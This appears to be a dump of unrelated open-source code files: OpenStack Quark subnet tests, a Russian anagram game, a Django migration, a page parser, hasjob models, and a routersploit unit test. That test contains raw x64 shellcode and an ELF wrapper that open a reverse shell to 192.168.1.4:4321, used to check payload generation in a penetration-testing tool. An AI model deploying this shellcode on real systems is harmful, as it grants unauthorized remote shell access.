gateway_ip=neutron_attrs.ATTR_NOT_SPECIFIED,
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
enable_dhcp=None))
network = dict(network_id=1)
with self._stubs(
subnet=subnet["subnet"],
network=network,
routes=routes
) as (subnet_create, dns_create, route_create):
dns_nameservers = subnet["subnet"].pop("dns_nameservers")
gateway_ip = subnet["subnet"].pop("gateway_ip")
subnet_request = copy.deepcopy(subnet)
subnet_request["subnet"]["dns_nameservers"] = dns_nameservers
subnet_request["subnet"]["gateway_ip"] = gateway_ip
res = self.plugin.create_subnet(self.context, subnet_request)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
for key in subnet["subnet"].keys():
if key == "gateway_ip":
self.assertEqual(res[key], "172.16.0.1")
elif key == "host_routes":
self.assertEqual(res[key][0]["destination"], "0.0.0.0/0")
self.assertEqual(res[key][0]["nexthop"], "172.16.0.1")
else:
self.assertEqual(res[key], subnet["subnet"][key])
def test_create_subnet_dns_nameservers(self):
routes = [dict(cidr="0.0.0.0/0", gateway="0.0.0.0")]
dns_ns = [dict(ip="4.2.2.1"), dict(ip="4.2.2.2")]
subnet = dict(
subnet=dict(network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24", gateway_ip="0.0.0.0",
dns_nameservers=["4.2.2.1", "4.2.2.2"],
enable_dhcp=None))
network = dict(network_id=1)
with self._stubs(
subnet=subnet["subnet"],
network=network,
routes=routes,
dns=dns_ns
) as (subnet_create, dns_create, route_create):
res = self.plugin.create_subnet(self.context,
copy.deepcopy(subnet))
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(dns_create.call_count, 2)
self.assertEqual(route_create.call_count, 1)
for key in subnet["subnet"].keys():
if key == "host_routes":
self.assertEqual(res[key][0]["destination"], "0.0.0.0/0")
self.assertEqual(res[key][0]["nexthop"], "0.0.0.0")
else:
self.assertEqual(res[key], subnet["subnet"][key])
def test_create_subnet_routes(self):
routes = [dict(cidr="1.1.1.1/8", gateway="172.16.0.4"),
dict(cidr="0.0.0.0/0", gateway="0.0.0.0")]
subnet = dict(
subnet=dict(network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24", gateway_ip="0.0.0.0",
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
host_routes=[{"destination": "1.1.1.1/8",
"nexthop": "172.16.0.4"}],
enable_dhcp=None))
network = dict(network_id=1)
with self._stubs(
subnet=subnet["subnet"],
network=network,
routes=routes
) as (subnet_create, dns_create, route_create):
dns_nameservers = subnet["subnet"].pop("dns_nameservers")
subnet_request = copy.deepcopy(subnet)
subnet_request["subnet"]["dns_nameservers"] = dns_nameservers
res = self.plugin.create_subnet(self.context, subnet_request)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 2)
for key in subnet["subnet"].keys():
if key == "host_routes":
res_tuples = [(r["destination"], r["nexthop"])
for r in res[key]]
self.assertIn(("1.1.1.1/8", "172.16.0.4"), res_tuples)
self.assertIn(("0.0.0.0/0", "0.0.0.0"), res_tuples)
self.assertEqual(2, len(res_tuples))
else:
self.assertEqual(res[key], subnet["subnet"][key])
def test_create_subnet_default_route(self):
routes = [dict(cidr="0.0.0.0/0", gateway="172.16.0.4")]
subnet = dict(
subnet=dict(network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24",
gateway_ip=neutron_attrs.ATTR_NOT_SPECIFIED,
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
host_routes=[{"destination": "0.0.0.0/0",
"nexthop": "172.16.0.4"}],
enable_dhcp=None))
network = dict(network_id=1)
with self._stubs(
subnet=subnet["subnet"],
network=network,
routes=routes
) as (subnet_create, dns_create, route_create):
dns_nameservers = subnet["subnet"].pop("dns_nameservers")
gateway_ip = subnet["subnet"].pop("gateway_ip")
subnet_request = copy.deepcopy(subnet)
subnet_request["subnet"]["dns_nameservers"] = dns_nameservers
subnet_request["subnet"]["gateway_ip"] = gateway_ip
res = self.plugin.create_subnet(self.context, subnet_request)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
for key in subnet["subnet"].keys():
if key == "host_routes":
res_tuples = [(r["destination"], r["nexthop"])
for r in res[key]]
self.assertEqual([("0.0.0.0/0", "172.16.0.4")], res_tuples)
elif key == "gateway_ip":
self.assertEqual(res[key], "172.16.0.4")
else:
self.assertEqual(res[key], subnet["subnet"][key])
def test_create_subnet_default_route_gateway_ip(self):
"""If default route (host_routes) and gateway_ip are both provided,
then host_route takes precedence.
"""
routes = [dict(cidr="0.0.0.0/0", gateway="172.16.0.4")]
subnet = dict(
subnet=dict(network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24",
gateway_ip="172.16.0.3",
dns_nameservers=neutron_attrs.ATTR_NOT_SPECIFIED,
host_routes=[{"destination": "0.0.0.0/0",
"nexthop": "172.16.0.4"}],
enable_dhcp=None))
network = dict(network_id=1)
with self._stubs(
subnet=subnet["subnet"],
network=network,
routes=routes
) as (subnet_create, dns_create, route_create):
dns_nameservers = subnet["subnet"].pop("dns_nameservers")
subnet_request = copy.deepcopy(subnet)
subnet_request["subnet"]["dns_nameservers"] = dns_nameservers
res = self.plugin.create_subnet(self.context, subnet_request)
self.assertEqual(subnet_create.call_count, 1)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
for key in subnet["subnet"].keys():
if key == "host_routes":
res_tuples = [(r["destination"], r["nexthop"])
for r in res[key]]
self.assertEqual([("0.0.0.0/0", "172.16.0.4")], res_tuples)
elif key == "gateway_ip":
self.assertEqual(res[key], "172.16.0.4")
else:
self.assertEqual(res[key], subnet["subnet"][key])
class TestQuarkUpdateSubnet(test_quark_plugin.TestQuarkPlugin):
DEFAULT_ROUTE = [dict(destination="0.0.0.0/0",
nexthop="172.16.0.1")]
@contextlib.contextmanager
def _stubs(self, host_routes=None, new_routes=None, find_routes=True,
new_dns_servers=None):
if host_routes is None:
host_routes = []
if new_routes:
new_routes = [models.Route(cidr=r["destination"],
gateway=r["nexthop"],
subnet_id=1)
for r in new_routes]
if new_dns_servers:
new_dns_servers = [models.DNSNameserver(
ip=ip,
subnet_id=1) for ip in new_dns_servers]
subnet = dict(
id=1,
network_id=1,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="172.16.0.0/24",
host_routes=host_routes,
dns_nameservers=["4.2.2.1", "4.2.2.2"],
enable_dhcp=None)
dns_ips = subnet.pop("dns_nameservers", [])
host_routes = subnet.pop("host_routes", [])
subnet_mod = models.Subnet()
subnet_mod.update(subnet)
subnet_mod["dns_nameservers"] = [models.DNSNameserver(ip=ip)
for ip in dns_ips]
subnet_mod["routes"] = [models.Route(cidr=r["destination"],
gateway=r["nexthop"],
subnet_id=subnet_mod["id"])
for r in host_routes]
with contextlib.nested(
mock.patch("quark.db.api.subnet_find"),
mock.patch("quark.db.api.subnet_update"),
mock.patch("quark.db.api.dns_create"),
mock.patch("quark.db.api.route_find"),
mock.patch("quark.db.api.route_update"),
mock.patch("quark.db.api.route_create"),
) as (subnet_find, subnet_update,
dns_create,
route_find, route_update, route_create):
subnet_find.return_value = subnet_mod
route_find.return_value = subnet_mod["routes"][0] \
if subnet_mod["routes"] and find_routes else None
new_subnet_mod = models.Subnet(network=models.Network())
new_subnet_mod.update(subnet_mod)
if new_routes:
new_subnet_mod["routes"] = new_routes
if new_dns_servers:
new_subnet_mod["dns_nameservers"] = new_dns_servers
subnet_update.return_value = new_subnet_mod
yield dns_create, route_update, route_create
def test_update_subnet_not_found(self):
with self.assertRaises(exceptions.SubnetNotFound):
self.plugin.update_subnet(self.context, 1, {})
def test_update_subnet_dns_nameservers(self):
new_dns_servers = ["1.1.1.2"]
with self._stubs(
host_routes=self.DEFAULT_ROUTE,
new_dns_servers=new_dns_servers
) as (dns_create, route_update, route_create):
req = dict(subnet=dict(dns_nameservers=new_dns_servers))
res = self.plugin.update_subnet(self.context,
1,
req)
self.assertEqual(dns_create.call_count, 1)
self.assertEqual(route_create.call_count, 0)
self.assertEqual(res["dns_nameservers"], new_dns_servers)
def test_update_subnet_routes(self):
new_routes = [dict(destination="10.0.0.0/24",
nexthop="1.1.1.1")]
with self._stubs(
host_routes=self.DEFAULT_ROUTE,
new_routes=new_routes
) as (dns_create, route_update, route_create):
req = dict(subnet=dict(
host_routes=new_routes))
res = self.plugin.update_subnet(self.context, 1, req)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
self.assertEqual(len(res["host_routes"]), 1)
self.assertEqual(res["host_routes"][0]["destination"],
"10.0.0.0/24")
self.assertEqual(res["host_routes"][0]["nexthop"],
"1.1.1.1")
self.assertIsNone(res["gateway_ip"])
def test_update_subnet_gateway_ip_with_default_route_in_db(self):
with self._stubs(
host_routes=self.DEFAULT_ROUTE,
new_routes=[dict(destination="0.0.0.0/0", nexthop="1.2.3.4")]
) as (dns_create, route_update, route_create):
req = dict(subnet=dict(gateway_ip="1.2.3.4"))
res = self.plugin.update_subnet(self.context, 1, req)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 0)
self.assertEqual(route_update.call_count, 1)
self.assertEqual(len(res["host_routes"]), 1)
self.assertEqual(res["host_routes"][0]["destination"],
"0.0.0.0/0")
self.assertEqual(res["host_routes"][0]["nexthop"],
"1.2.3.4")
self.assertEqual(res["gateway_ip"], "1.2.3.4")
def test_update_subnet_gateway_ip_with_non_default_route_in_db(self):
with self._stubs(
host_routes=[dict(destination="1.1.1.1/8", nexthop="9.9.9.9")],
find_routes=False,
new_routes=[dict(destination="1.1.1.1/8", nexthop="9.9.9.9"),
dict(destination="0.0.0.0/0", nexthop="1.2.3.4")]
) as (dns_create, route_update, route_create):
req = dict(subnet=dict(gateway_ip="1.2.3.4"))
res = self.plugin.update_subnet(self.context, 1, req)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
self.assertEqual(res["gateway_ip"], "1.2.3.4")
self.assertEqual(len(res["host_routes"]), 2)
res_tuples = [(r["destination"], r["nexthop"])
for r in res["host_routes"]]
self.assertIn(("0.0.0.0/0", "1.2.3.4"), res_tuples)
self.assertIn(("1.1.1.1/8", "9.9.9.9"), res_tuples)
def test_update_subnet_gateway_ip_without_default_route_in_db(self):
with self._stubs(
host_routes=None,
new_routes=[dict(destination="0.0.0.0/0", nexthop="1.2.3.4")]
) as (dns_create, route_update, route_create):
req = dict(subnet=dict(gateway_ip="1.2.3.4"))
res = self.plugin.update_subnet(self.context, 1, req)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
self.assertEqual(len(res["host_routes"]), 1)
self.assertEqual(res["host_routes"][0]["destination"],
"0.0.0.0/0")
self.assertEqual(res["host_routes"][0]["nexthop"],
"1.2.3.4")
self.assertEqual(res["gateway_ip"], "1.2.3.4")
def test_update_subnet_gateway_ip_with_default_route_in_args(self):
new_routes = [dict(destination="0.0.0.0/0",
nexthop="4.3.2.1")]
with self._stubs(
host_routes=self.DEFAULT_ROUTE,
new_routes=new_routes
) as (dns_create, route_update, route_create):
req = dict(subnet=dict(
host_routes=new_routes,
gateway_ip="1.2.3.4"))
res = self.plugin.update_subnet(self.context, 1, req)
self.assertEqual(dns_create.call_count, 0)
self.assertEqual(route_create.call_count, 1)
self.assertEqual(len(res["host_routes"]), 1)
self.assertEqual(res["host_routes"][0]["destination"],
"0.0.0.0/0")
self.assertEqual(res["host_routes"][0]["nexthop"],
"4.3.2.1")
self.assertEqual(res["gateway_ip"], "4.3.2.1")
class TestQuarkDeleteSubnet(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, subnet, ips):
ip_mods = []
subnet_mod = None
if subnet:
subnet_mod = models.Subnet()
subnet_mod.update(subnet)
for ip in ips:
ip_mod = models.IPAddress()
ip_mod.update(ip)
ip_mods.append(ip_mod)
db_mod = "quark.db.api"
with contextlib.nested(
mock.patch("%s.subnet_find" % db_mod),
mock.patch("%s.subnet_delete" % db_mod)
) as (sub_find, sub_delete):
if subnet_mod:
subnet_mod.allocated_ips = ip_mods
sub_find.return_value = subnet_mod
yield sub_delete
def test_delete_subnet(self):
subnet = dict(id=1)
with self._stubs(subnet=subnet, ips=[]) as sub_delete:
self.plugin.delete_subnet(self.context, 1)
self.assertTrue(sub_delete.called)
def test_delete_subnet_no_subnet_fails(self):
with self._stubs(subnet=None, ips=[]):
with self.assertRaises(exceptions.SubnetNotFound):
self.plugin.delete_subnet(self.context, 1)
def test_delete_subnet_has_allocated_ips_fails(self):
subnet = dict(id=1)
with self._stubs(subnet=subnet, ips=[{}]):
with self.assertRaises(exceptions.SubnetInUse):
self.plugin.delete_subnet(self.context, 1)
class TestSubnetsNotification(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, s, deleted_at=None):
class FakeContext(object):
def __enter__(*args, **kwargs):
pass
def __exit__(*args, **kwargs):
pass
self.context.session.begin = FakeContext
s["network"] = models.Network()
s["network"]["created_at"] = s["created_at"]
subnet = models.Subnet(**s)
db_mod = "quark.db.api"
api_mod = "neutron.openstack.common.notifier.api"
time_mod = "neutron.openstack.common.timeutils"
with contextlib.nested(
mock.patch("%s.subnet_find" % db_mod),
mock.patch("%s.network_find" % db_mod),
mock.patch("%s.subnet_create" % db_mod),
mock.patch("%s.ip_policy_create" % db_mod),
mock.patch("%s.subnet_delete" % db_mod),
mock.patch("%s.notify" % api_mod),
mock.patch("%s.utcnow" % time_mod)
) as (sub_find, net_find, sub_create, pol_cre, sub_del, notify,
time_func):
sub_create.return_value = subnet
sub_find.return_value = subnet
time_func.return_value = deleted_at
yield notify
def test_create_subnet_notification(self):
s = dict(network_id=1, cidr="192.168.10.0/24",
tenant_id=1, id=1, created_at="123")
with self._stubs(s) as notify:
self.plugin.create_subnet(self.context, dict(subnet=s))
notify.assert_called_once_with(
self.context,
notifier_api.publisher_id("network"),
"ip_block.create",
notifier_api.CONF.default_notification_level,
dict(tenant_id=s["tenant_id"],
ip_block_id=s["id"],
created_at=s["created_at"]))
def test_delete_subnet_notification(self):
now = time.strftime('%Y-%m-%d %H:%M:%S')
later = time.strftime('%Y-%m-%d %H:%M:%S')
s = dict(tenant_id=1, id=1, created_at=now)
with self._stubs(s, deleted_at=later) as notify:
self.plugin.delete_subnet(self.context, 1)
notify.assert_called_once_with(
self.context,
notifier_api.publisher_id("network"),
"ip_block.delete",
notifier_api.CONF.default_notification_level,
dict(tenant_id=s["tenant_id"],
created_at=s["created_at"],
ip_block_id=s["id"],
deleted_at=later))
class TestQuarkDiagnoseSubnets(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, subnets=None, routes=None):
if routes is None:
routes = []
route_models = []
for route in routes:
r = models.Route()
r.update(route)
route_models.append(r)
if isinstance(subnets, list):
subnet_models = []
for subnet in subnets:
s_dict = subnet.copy()
s_dict["routes"] = route_models
s = models.Subnet(network=models.Network())
s.update(s_dict)
subnet_models.append(s)
elif subnets:
mod = models.Subnet(network=models.Network())
mod.update(subnets)
mod["routes"] = route_models
subnet_models = mod
else:
subnet_models = None
with mock.patch("quark.db.api.subnet_find") as subnet_find:
subnet_find.return_value = subnet_models
yield
def test_diagnose_subnet_with_wildcard_id_no_existing_subnets(self):
with self._stubs(subnets=[], routes=[]):
expected = {'subnets': []}
actual = self.plugin.diagnose_subnet(self.context, "*", None)
self.assertEqual(expected, actual)
def test_diagnose_subnet_with_wildcard_with_existing_subnets(self):
subnet_id = str(uuid.uuid4())
route = dict(id=1, cidr="0.0.0.0/0", gateway="192.168.0.1")
subnet = dict(id=subnet_id, network_id=1, name=subnet_id,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="192.168.0.0/24", gateway_ip="192.168.0.1",
dns_nameservers=[],
enable_dhcp=None)
with self._stubs(subnets=[subnet], routes=[route]):
actual = self.plugin.diagnose_subnet(self.context, "*", None)
self.maxDiff = None
self.assertEqual(subnet["id"], actual["subnets"][0]["id"])
def test_diagnose_subnet_with_regular_id(self):
subnet_id = "12345"
route = dict(id=1, cidr="0.0.0.0/0", gateway="192.168.0.1")
subnet = dict(id=subnet_id, network_id=1, name=subnet_id,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="192.168.0.0/24", gateway_ip="192.168.0.1",
dns_nameservers=[],
enable_dhcp=None)
with self._stubs(subnets=subnet, routes=[route]):
actual = self.plugin.diagnose_subnet(self.context, subnet_id, None)
self.assertEqual(subnet["id"], actual["subnets"]["id"])
| apache-2.0 | 5,589,751,111,151,484,000 | 43.042373 | 79 | 0.546469 | false |
Mariaanisimova/pythonintask | IVTa/2014/EGOROV_V_I/task_8_8.py | 1 | 2933 | # Задача 8. Вариант 8
'''
Доработайте игру "Анаграммы" (см. М.Доусон
Программируем на Python. Гл.4) так, чтобы к
каждому слову полагалась подсказка. Игрок должен
получать право на подсказку в том случае, если
у него нет никаких предположений. Разработайте
систему начисления очков, по которой бы игроки,
отгадавшие слово без подсказки, получали больше
тех, кто запросил подсказку.
'''
# Egorov V. I.
# 15.05.2016
from random import shuffle, choice
fine = 0
score = 0
attempts = 3
cont = 1
while cont == 1 and attempts > 0:
def score_print(score):
print ('У вас', score, 'очков')
print ('У вас', attempts, 'попытки')
words_and_info = (
('Венера', 'Самая горячая планета Солнечной системы.'),
('Меркурий', 'Эта планета самая ближняя к Солнцу'),
('Юпитер', 'Самая большая планета Солнечной системы'),
('Плутон', 'Самая маленькая планета Солнечной системы'),
('Земля', 'Существование жизни на этой планете не оставляет никаких сомнений'),
('Сатурн', 'Эта планета имеет ярко выраженную систему колец'),
('Марс', 'На самом деле на этой плане есть вода'),
('Уран', 'Кажется, этой планете не сообщили, что обращаться вокруг своей оси нужно с востока на запад'),
('Нептун', 'Злые языки говорят, что именно эта планета - самая дальняя от Солнца в её системе.')
)
choiced = choice(words_and_info)
word = list(choiced[0].lower())
shuffle(word)
word = ''.join(word)
print('Отгадай планету Солнечной системы -', word)
print('Наберите "подсказка", чтобы получить совет')
score_print(score)
fine=0
while True and attempts > 0:
gues = input('> ').lower()
if gues.lower() == 'подсказка':
print('Подскaзка: ', choiced[1])
fine=1
score_print(score)
continue
elif gues.lower() == choiced[0].lower():
print('Правильно -', choiced[0])
score += 2 - fine
score_print(score)
break
else:
print('Не правильно')
attempts -= 1
score_print(score)
yepnope=input('Продолжить?')
if yepnope == 'да' or yepnope == 'Да':
cont = 1
else:
cont = 0
input('Нажмите ENTER...')
| apache-2.0 | -1,640,939,314,107,939,300 | 27.333333 | 105 | 0.683333 | false |
dasseclab/dasseclab | clones/routersploit/tests/payloads/x64/test_reverse_tcp.py | 1 | 1678 | from routersploit.modules.payloads.x64.reverse_tcp import Payload
# reverse tcp with lhost=192.168.1.4 lport=4321
reverse_tcp = (
b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
b"\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10"
b"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
b"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
# elf x64 reverse tcp
elf_x64_reverse_tcp = (
b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00"
b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00"
b"\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
b"\x40\x00\x00\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x0c"
b"\x01\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
b"\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10"
b"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
b"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Payload()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
assert payload.generate_elf(reverse_tcp) == elf_x64_reverse_tcp
| gpl-2.0 | 1,970,158,449,034,645,000 | 42.025641 | 67 | 0.679976 | false |
flavoi/diventi | diventi/ebooks/migrations/0110_auto_20200830_1750.py | 1 | 3345 | # Generated by Django 2.2.13 on 2020-08-30 15:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ebooks', '0109_auto_20200821_1049'),
]
operations = [
migrations.AlterField(
model_name='book',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='chapter',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='part',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='replacementrule',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='secret',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='section',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='sectionaspect',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='universalsection',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
]
| apache-2.0 | 6,576,685,759,129,036,000 | 62.113208 | 284 | 0.556652 | false |
Malphaet/vkyweb | generator/file_parser.py | 1 | 6822 | # Copyleft (c) 2016 Cocobug All Rights Reserved.
# -*- coding: utf_8 -*-
import os,sys,codecs
import re
import traceback
class WebPage(object):
"A webpage object, with some variables and all localisations"
def __init__(self,path):
self.path=path
self.name=os.path.split(path)[-1]
self.variables={}
self.list_of_lang=set()
self.reserved=set(["model"])
self.reserved_prefix="reserved_"
self.content=[]
def init_reserved(self,*others):
"Init all the reserved variables, note that no protections are used, so use them at your own risk"
for i in others:
self.reserved.add(i)
for key in self.reserved:
setattr(self,key,"")
def set_reserved(self,var,value=""):
"Set a reserved variable"
setattr(self,self.reserved_prefix+key,value)
def get_reserved(self,var):
"Get a reserved variable"
return getattr(self,self.reserved_prefix+var)
def add_content(self,text,lang):
"Add a line of content, with the appropriates langues"
self.content.append([text,lang])
def get_next_line(self,filter_lang="*"):
"Get a line of text, with a filter if needed"
for line,lang in self.content:
if self.match_with_lang(lang,filter_lang):
yield line
def match_with_lang(self,lang,filter_lang):
"""Will make sense if I ever use a translation table and not a clusterf*ck of strings"""
for l in lang:
if l=="*" or l==filter_lang:
return 1
return 0
def get_text(self,filter_lang):
"Get the whole text matching the filter, note that the * filter will ONLY match if the text is meant for all, not all text"
text=""
for line in self.get_next_line(filter_lang):
text+=line
text+=os.linesep
return text
def add_variable(self,var,value):
"""Add the folowing variable and update the necessary constants
Note that it's one of the only ways to add a language to the list_of_lang
Takes a variable (with an eventual langague tag) and it's value"""
var,lang=create_lang(var)
if var in self.reserved:
setattr(self,var,value)
else:
add_to_table(var,lang,value,self.variables)
self.list_of_lang.add(lang)
def get_variable(self,varname,filter_lang="*"):
"Get a variable, if * or nothing is used a filter the program will attempt to give a global variable, or will yield one at random"
#print "Getting",varname,filter_lang,"in",self.variables
#if varname in self.reserved:
# return getattr(self,varname)
if varname in self.variables:
if filter_lang in self.variables[varname]:
return self.variables[varname][filter_lang]
else:
if filter_lang=="*":
return self.variables[varname].values()[0]
return self.variables[varname]["*"]
raise KeyError("The variable "+varname+" doens't exist in the language "+filter_lang)
def export(self):
"Export the Webobject in every language"
exp={}
for lang in self.list_of_lang:
exp[lang]=self.get_text(lang)
return exp
def add_to_table(var,lang,value,table):
"For now it works in tandem with create_lang and add to a dict with the lang"
if var in table:
table[var][lang]=value
else:
table[var]={lang:value}
return table
def create_lang(var):
"""Takes a variable (with an eventual language tag) and it's value and return var,lang,value
Only the last _ determines the language, note that it could give the impression _ is ok to use in variables. It is not."""
s_var=var.rsplit('_',1)
if len(s_var)==2:
if "" in s_var:
return var,"*"
return s_var[0],s_var[1]
return var ,"*"
def parse_file(file_name):
"Parse a file and return a webpage object"
page=WebPage(file_name)
page.init_reserved()
with open(file_name) as f:
try:
while True: # Parse the config file
line=f.readline()
if not line: # Wait for the last line
break
if line.startswith("----"): # Not really a good practice, but meh
break
if line!=os.linesep: # Now parsing config files
var,value=re_config_line.match(line).groups()
page.add_variable(var,value)
used_langs={} # Keep trace of all used langs and opened/closed matchs
while True: # The config lines are now parsed, will now enter the nightmare of standart lines
line=f.readline()
if not line: # Wait for the last line
break
match=re_text_line.match(line) #Will always match since there is a .* in the regex
beg_lang,end_lang,text=match.groups()
page_text=[]
if beg_lang: #Will now add a lang to witch the program should write
if beg_lang in used_langs:
used_langs[beg_lang]+=1
else:
used_langs[beg_lang]=1
elif end_lang:
if end_lang in used_langs:
used_langs[end_lang]-=1
else:
used_langs[end_lang]=0 # This should never happen, but...users
elif text:
line_langs=[] # Langs used in the current line
for l in used_langs: #
if used_langs[l]>0:
line_langs.append(l)
if len(line_langs)==0: # If no langs are used, print in every lang (standart behavior)
line_langs=["*"]
page.add_content(text,line_langs)
except re.error:
print("Error parsing",file_name,"contain a non parsable line:")
print(" >",line)
except:
traceback.print_exc()
page.list_of_lang.update(used_langs) # Not sure this fix is actually a good idea, could just force adding langs in variables
return page
re_config_line=re.compile("(?P<variable>.+): (?P<value>.*)")
re_text_line=re.compile("__(?P<beg_lang>[\*\w]+)__|__/(?P<end_lang>[\*\w]+)__|(?P<text>.*)")
if __name__ == '__main__':
import tree_parser
config=parse_file("sites/example_website/_config.txt")
index=parse_file("sites/example_website/index.txt")
print("All text only")
print(index.get_text("*"))
print("Fr text only")
print(index.get_text("fr"))
print("En text only")
print(index.get_text("en"))
| unlicense | 2,348,765,967,386,563,000 | 37.982857 | 138 | 0.572266 | false |
sindhus/hasjob | hasjob/models/__init__.py | 1 | 2623 | # -*- coding: utf-8 -*-
# flake8: noqa
from datetime import timedelta
from coaster import LabeledEnum
from coaster.db import db
from coaster.sqlalchemy import (BaseMixin, BaseNameMixin, TimestampMixin, BaseScopedIdMixin,
BaseScopedNameMixin, CoordinatesMixin, make_timestamp_columns)
from .. import app
agelimit = timedelta(days=30)
newlimit = timedelta(days=1)
class POSTSTATUS:
DRAFT = 0 # Being written
PENDING = 1 # Pending email verification
CONFIRMED = 2 # Post is now live on site
REVIEWED = 3 # Reviewed and cleared for push channels
REJECTED = 4 # Reviewed and rejected as inappropriate
WITHDRAWN = 5 # Withdrawn by owner
FLAGGED = 6 # Flagged by users for review
SPAM = 7 # Marked as spam
MODERATED = 8 # Moderated, needs edit
ANNOUNCEMENT = 9 # Special announcement
CLOSED = 10 # Not accepting applications, but publicly viewable
UNPUBLISHED = (DRAFT, PENDING)
GONE = (REJECTED, WITHDRAWN, SPAM)
LISTED = (CONFIRMED, REVIEWED, ANNOUNCEMENT)
POSTPENDING = (CONFIRMED, REVIEWED, REJECTED, WITHDRAWN, FLAGGED, SPAM, MODERATED, ANNOUNCEMENT)
